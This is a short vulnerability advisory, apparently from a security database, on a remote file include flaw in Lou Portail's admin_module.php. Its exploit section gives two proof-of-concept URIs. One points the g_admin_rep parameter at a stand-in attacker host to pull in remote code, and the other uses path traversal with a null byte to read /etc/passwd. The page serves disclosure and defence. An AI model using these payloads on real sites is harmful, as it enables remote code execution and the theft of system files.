Lou Portail Admin_Module.PHP Remote File Include Vulnerability

info
discussion
exploit
solution
references

Lou Portail Admin_Module.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt
http://www.example.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00